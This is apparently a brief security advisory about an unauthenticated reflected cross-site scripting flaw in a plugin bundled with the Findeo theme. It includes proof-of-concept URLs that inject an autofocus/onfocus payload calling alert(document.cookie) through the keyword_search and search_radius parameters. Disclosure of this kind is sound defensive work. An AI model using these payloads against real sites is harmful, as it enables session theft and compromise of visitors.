The plugin, used by the Findeo Theme, did not properly sanitise the keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page, leading to an unauthenticated reflected Cross-Site Scripting issue.
https://example.com/properties/?keyword_search=--!>" autofocus onfocus=alert(`m0ze`);//" https://example.com/properties/?keyword_search=--!>" autofocus onfocus=alert(document.cookie);//"&search;_radius=--!>" autofocus onfocus=alert(document.cookie);//"